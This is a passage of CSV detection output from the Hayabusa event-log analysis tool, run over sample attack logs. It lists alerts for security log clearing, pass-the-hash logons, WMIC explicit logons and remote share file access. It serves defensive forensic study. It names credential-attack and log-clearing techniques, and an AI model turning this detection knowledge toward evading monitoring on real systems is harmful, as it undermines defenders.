365ABB72-AC01-5C8E-0000-0010656E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:20:17.927 +09:00,PC04.example.corp,1,medium,Evas,File or Folder Permissions Modifications,,rules/sigma/process_creation/proc_creation_win_file_permission_modifications.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:22:59.399 +09:00,PC04.example.corp,13,high,Persis,Changing RDP Port to Non Standard Number,,rules/sigma/registry_event/win_re_change_rdp_port.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:23:12.188 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: 
UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 2972 | PGUID: 365ABB72-ACB0-5C8E-0000-001085D50D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx +2019-03-18 05:43:12.784 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 136 | PGUID: 365ABB72-B160-5C8E-0000-0010253D1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 05:43:16.309 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3312 | PGUID: 365ABB72-B164-5C8E-0000-0010543F1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_13_keylogger_directx.evtx +2019-03-18 20:06:25.485 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,info,,Logon Type 9 - NewCredentials,User: user01 | Computer: | IP Addr: ::1 | LID: 0x4530f0f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 
+09:00,PC01.example.corp,4672,info,,Admin Logon,User: user01 | LID: 0x4530f0f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:06:29.911 +09:00,PC01.example.corp,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_4624_mimikatz_sekurlsa_pth_source_machine.evtx +2019-03-18 20:27:00.438 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.231 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: user01 | Target User: administrator | IP Address: - | Process: C:\Windows\System32\svchost.exe | Target Server: RPCSS/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: host/WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.261 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote 
Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: user01 | Tgt User: administrator | IP Addr: - | Process: C:\Windows\System32\wbem\WMIC.exe | Tgt Svr: WIN-77LTAPHIQ1R.example.corp,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 20:27:23.271 +09:00,PC01.example.corp,4648,medium,LatMov,Suspicious Remote Logon with Explicit Credentials,,rules/sigma/builtin/security/win_susp_logon_explicit_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMIC_4648_rpcss.evtx +2019-03-18 23:23:22.264 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
